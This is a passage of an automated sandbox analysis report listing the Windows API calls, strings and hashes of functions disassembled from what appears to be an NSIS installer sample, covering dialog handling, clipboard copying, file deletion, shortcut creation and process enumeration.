Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNEL32(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNEL32(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: b870e07e0f90b65775997a4172df4cb72c50b11c5a38a9ad208b9f3c2b6ee9f0
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

, xrefs: 00404F65
N, xrefs: 00404C32
@, xrefs: 00404BBC
M, xrefs: 00404B6F

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*), ref: 00406D35
lstrcatW.KERNEL32(?,00409838), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
Delete: DeleteFile failed("%s"), xrefs: 00406E29
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
Delete: DeleteFile("%s"), xrefs: 00406DE8
\*.*, xrefs: 00406D2F
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042517C,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

GetTTFNameString, xrefs: 00406F33
name, xrefs: 00406FEB
%s: failed opening file "%s", xrefs: 00406F38

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042517C,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042517C,74DF23A0,00000000), ref: 00406A73

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406858
F, xrefs: 00406A7F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Process32FirstW, xrefs: 004065E9
PSAPI.DLL, xrefs: 00406490
GetModuleBaseNameW, xrefs: 004064C0
EnumProcesses, xrefs: 004064AE
CreateToolhelp32Snapshot, xrefs: 004065E1
EnumProcessModules, xrefs: 004064B6
Process32NextW, xrefs: 004065F4
Module32FirstW, xrefs: 004065FF
Kernel32.DLL, xrefs: 004065C7
Unknown, xrefs: 00406528
Module32NextW, xrefs: 0040660A

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
EnableWindow.USER32(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
